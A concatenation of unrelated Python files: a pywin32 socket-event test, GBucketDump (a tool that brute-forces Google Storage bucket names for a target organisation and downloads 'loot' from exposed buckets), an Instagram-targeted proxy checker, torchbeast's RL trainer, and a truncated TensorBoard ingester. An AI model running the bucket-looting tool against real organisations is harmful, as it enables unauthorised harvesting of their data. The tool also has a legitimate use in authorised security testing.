self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error, e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error, e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(port, port_event,
win32file.FD_ACCEPT |
win32file.FD_CLOSE)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(client, client_event,
win32file.FD_CONNECT |
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(server, server_event,
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0,
win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error, e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error, e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events: break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == '__main__':
testmain()
|
GBucketDump.py
|
#!/usr/bin/env python
# GBucketDump is a tool to quickly enumerate Google Storage buckets to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically to Google Storage
# buckets and also has some extra features that allow you to grep for
# delicous files as well as download interesting files if you're not
# afraid to quickly fill up your hard drive.
# Andy from @Netscylla
# Forked from original AWSBucketDump code by Jordan Potti @ok_bye_now
from argparse import ArgumentParser
import codecs
import requests
import xmltodict
import sys
import os
import shutil
import traceback
from queue import Queue
from threading import Thread, Lock
bucket_q = Queue()
download_q = Queue()
grep_list=None
arguments = None
def fetch(url):
print('fetching ' + url)
response = requests.get(url)
if response.status_code == 403 or response.status_code == 404:
status403(url)
if response.status_code == 200:
if "Content" in response.text:
returnedList=status200(response,grep_list,url)
def bucket_worker():
while True:
item = bucket_q.get()
try:
fetch(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
bucket_q.task_done()
def downloadWorker():
print('download worker running')
while True:
item = download_q.get()
try:
downloadFile(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
download_q.task_done()
directory_lock = Lock()
def get_directory_lock():
directory_lock.acquire()
def release_directory_lock():
directory_lock.release()
def get_make_directory_return_filename_path(url):
global arguments
bits = url.split('/')
directory = arguments.savedir
for i in range(2,len(bits)-1):
directory = os.path.join(directory, bits[i])
try:
get_directory_lock()
if not os.path.isdir(directory):
os.makedirs(directory)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
finally:
release_directory_lock()
return os.path.join(directory, bits[-1]).rstrip()
interesting_file_lock = Lock()
def get_interesting_file_lock():
interesting_file_lock.acquire()
def release_interesting_file_lock():
interesting_file_lock.release()
def write_interesting_file(filepath):
try:
get_interesting_file_lock()
with open('interesting_file.txt', 'ab+') as interesting_file:
interesting_file.write(filepath.encode('utf-8'))
interesting_file.write('\n'.encode('utf-8'))
finally:
release_interesting_file_lock()
def downloadFile(filename):
global arguments
print('Downloading {}'.format(filename))
local_path = get_make_directory_return_filename_path(filename)
local_filename = (filename.split('/')[-1]).rstrip()
print('local {}'.format(local_path))
if local_filename =="":
print("Directory..\n")
else:
r = requests.get(filename.rstrip(), stream=True)
if 'Content-Length' in r.headers:
if int(r.headers['Content-Length']) > arguments.maxsize:
print("This file is greater than the specified max size.. skipping..\n")
else:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
r.close()
def print_banner():
print('''\nDescription:
GBucketDump is a tool to quickly enumerate Google Storage buckets to look for loot.
It's similar to a subdomain bruteforcer but is made specifically to Storage
buckets and also has some extra features that allow you to grep for
delicous files as well as download interesting files if you're not
afraid to quickly fill up your hard drive.
by Andy
@netscylla'''
)
def cleanUp():
print("Cleaning Up Files")
def status403(line):
print(line.rstrip() + " is not accessible")
def queue_up_download(filepath):
download_q.put(filepath)
print('Collectable: {}'.format(filepath))
write_interesting_file(filepath)
def status200(response,grep_list,line):
print("Pilfering "+line.rstrip())
objects=xmltodict.parse(response.text)
Keys = []
interest=[]
try:
for child in objects['ListBucketResult']['Contents']:
Keys.append(child['Key'])
except:
pass
hit = False
for words in Keys:
words = (str(words)).rstrip()
collectable = line+words
if grep_list != None and len(grep_list) > 0:
for grep_line in grep_list:
grep_line = (str(grep_line)).rstrip()
if grep_line in words:
queue_up_download(collectable)
break
else:
queue_up_download(collectable)
def main():
global arguments
global grep_list
parser = ArgumentParser()
parser.add_argument("-o", dest="organisation", required=False, default=False, help="target an organisation")
parser.add_argument("-D", dest="download", required=False, action="store_true", default=False, help="Download files. This requires significant diskspace")
parser.add_argument("-d", dest="savedir", required=False, default='', help="if -D, then -d 1 to create save directories for each bucket with results.")
parser.add_argument("-l", dest="hostlist", required=True, help="")
parser.add_argument("-g", dest="grepwords", required=False, help="Provide a wordlist to grep for")
parser.add_argument("-m", dest="maxsize", type=int, required=False, default=1024, help="Maximum file size to download.")
parser.add_argument("-t", dest="threads", type=int, required=False, default=1, help="thread count.")
if len(sys.argv) == 1:
print_banner()
parser.error("No arguments given.")
parser.print_usage
sys.exit()
# output parsed arguments into a usable object
arguments = parser.parse_args()
# specify primary variables
with open(arguments.grepwords, "r") as grep_file:
grep_content = grep_file.readlines()
grep_list = [ g.strip() for g in grep_content ]
if arguments.download and arguments.savedir:
print("Downloads enabled (-D), and save directories (-d) for each host will be created/used")
elif arguments.download and not arguments.savedir:
print("Downloads enabled (-D), and will be saved to current directory")
else:
print("Downloads were not enabled (-D), not saving results locally.")
if arguments.organisation:
print("Organisation target mode Enabled")
else:
arguments.organisation = None
# start up bucket workers
for i in range(0,arguments.threads):
print('starting thread')
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
# start download workers
for i in range(1, arguments.threads):
t = Thread(target=downloadWorker)
t.daemon = True
t.start()
with open(arguments.hostlist) as f:
for line in f:
if (arguments.organisation is not None):
bucket = 'http://storage.googleapis.com/'+line.rstrip()+'-'+arguments.organisation+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
if (arguments.organisation):
bucket = 'http://storage.googleapis.com/'+arguments.organisation+'-'+line.rstrip()+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
else:
bucket = 'http://storage.googleapis.com/'+line.rstrip()+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
if (arguments.organisation):
bucket = 'http://storage.googleapis.com/'+line.rstrip()+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
bucket_q.join()
if arguments.download:
print "Finshed enumeration. Starting Download..."
download_q.join()
cleanUp()
if __name__ == "__main__":
main()
|
main.py
|
import platform
from os import system
from time import sleep
from requests import Session
from threading import Thread, RLock
proxy_list = 'proxies.txt'
target_site = 'https://instagram.com'
def get_proxies():
proxies = []
with open(proxy_list, 'rt', encoding='utf-8') as proxies_file:
for line in proxies_file:
if not line:
continue
ip, port = line.replace('\r', '').split(':')
port = int(port)
proxy = {'ip': ip, 'port': port}
proxies.append(proxy)
return proxies
class TestProxies:
def __init__(self, proxies):
self.worked = 0
self.failed = 0
self.lock = RLock()
self.active_brs = 0
self.is_alive = True
self.proxies = proxies
self.total = len(proxies)
self.test_link = target_site
def display(self):
system('cls' if platform.system() == 'Windows' else 'clear')
worked, failed, total = self.worked, self.failed, self.total
worked_per = round((worked/total) * 100, 2)
failed_per = round((failed/total) * 100, 2)
complete = round(worked_per + failed_per, 2)
print(f'Complete: {complete}%')
print(f'Active browsers: {self.active_brs}')
print(f'Proxies worked: {worked_per}% [{worked}]')
print(f'Proxies failed: {failed_per}% [{failed}]')
def test_proxy(self, proxy):
br = Session()
addr = '{}:{}'.format(proxy['ip'], proxy['port'])
addr = {'http': addr, 'https': addr}
br.proxies.update(addr)
try:
br.get(self.test_link, timeout=(10, 15))
with self.lock:
self.worked += 1
except:
with self.lock:
self.failed += 1
finally:
br.close()
if self.is_alive:
with self.lock:
self.display()
self.active_brs -= 1
def start(self):
for proxy in self.proxies:
while self.is_alive and self.active_brs >= 512:
pass
if not self.is_alive:
break
with self.lock:
self.active_brs += 1
Thread(target=self.test_proxy, args=[proxy], daemon=True).start()
while self.is_alive and self.active_brs:
sleep(0.5)
self.display()
def stop(self):
self.is_alive = False
while self.active_brs:
try:
with self.lock:
self.display()
sleep(0.5)
except KeyboardInterrupt:
break
def examine(self):
failed = self.failed / self.total
worked = self.worked / self.total
if worked == 0:
print('Bad proxy list')
elif (failed - worked) >= 0.1:
print('Bad proxy list')
elif (failed - worked) == 0:
print('Bad proxy list')
else:
print('Good proxy list')
if __name__ == '__main__':
test_proxies = TestProxies(get_proxies())
try:
test_proxies.start()
except KeyboardInterrupt:
test_proxies.stop()
finally:
test_proxies.examine()
|
monobeast.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import atari_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (1 - batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
scheduler.step()
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.uint8),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def test(flags, num_episodes: int = 10):
if flags.xpid is None:
checkpointpath = "./latest/model.tar"
else:
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, flags.use_lstm)
model.eval()
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
observation = env.initial()
returns = []
while len(returns) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation)
policy_outputs, _ = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
returns.append(observation["episode_return"].item())
logging.info(
"Episode ended after %d steps. Return: %.1f",
observation["episode_step"].item(),
observation["episode_return"].item(),
)
env.close()
logging.info(
"Average returns over %i steps: %.1f", num_episodes, sum(returns) / len(returns)
)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = 1 - inputs["done"].float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
def create_env(flags):
return atari_wrappers.wrap_pytorch(
atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
else:
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
data_ingester.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides data ingestion logic backed by local event processing."""
import os
import re
import threading
import time
from tensorboard.backend.event_processing import data_provider
from tensorboard.backend.event_processing import plugin_event_multiplexer
from tensorboard.backend.event_processing import tag_types
from tensorboard.compat import tf
from tensorboard.data import ingester
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
tag_types.TENSORS: 10,
}
# TODO(@wchargin): Replace with something that works for third-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
logger = tb_logging.get_logger()
class LocalDataIngester(ingester.DataIngester):
"""Data ingestion implementation to use when running locally."""
def __init__(self, flags):
"""Initializes a `LocalDataIngester` from `flags`.
Args:
